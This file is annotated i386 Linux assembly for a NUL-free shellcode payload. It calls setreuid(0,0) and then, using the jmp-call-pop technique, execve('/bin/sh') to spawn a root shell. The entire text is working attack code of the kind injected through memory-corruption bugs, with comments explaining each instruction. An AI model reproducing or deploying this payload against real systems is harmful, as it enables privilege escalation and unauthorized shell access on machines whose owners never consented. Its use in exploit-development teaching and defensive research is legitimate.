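SECTION .text
global _start

_start:
    xor eax, eax            ; eax = 0
    mov al, 70              ; i386 syscall 70 = setreuid (writing al keeps NUL bytes out of the encoding)
    xor ebx, ebx            ; ruid = 0
    xor ecx, ecx            ; euid = 0
    int 0x80                ; setreuid(0, 0)
    jmp short ender         ; jump forward so the call below can push the string address

starter:
    xor eax, eax            ; eax = 0
    pop ebx                 ; ebx = address of the string (return address pushed by call)
    mov [ebx+7], al         ; overwrite 'N' with NUL to terminate "/bin/sh"
    mov [ebx+8], ebx        ; overwrite "AAAA" with a pointer to the string: argv[0]
    mov [ebx+12], eax       ; overwrite "BBBB" with NULL: argv[1], also used as envp
    mov al, 11              ; i386 syscall 11 = execve
    lea ecx, [ebx+8]        ; ecx = argv
    lea edx, [ebx+12]       ; edx = envp (points at the NULL)
    int 0x80                ; execve("/bin/sh", argv, envp)

ender:
    call starter            ; pushes the address of the bytes that follow, then jumps back
    db "/bin/shNAAAABBBB"   ; path, then placeholders for the NUL, argv[0] and NULL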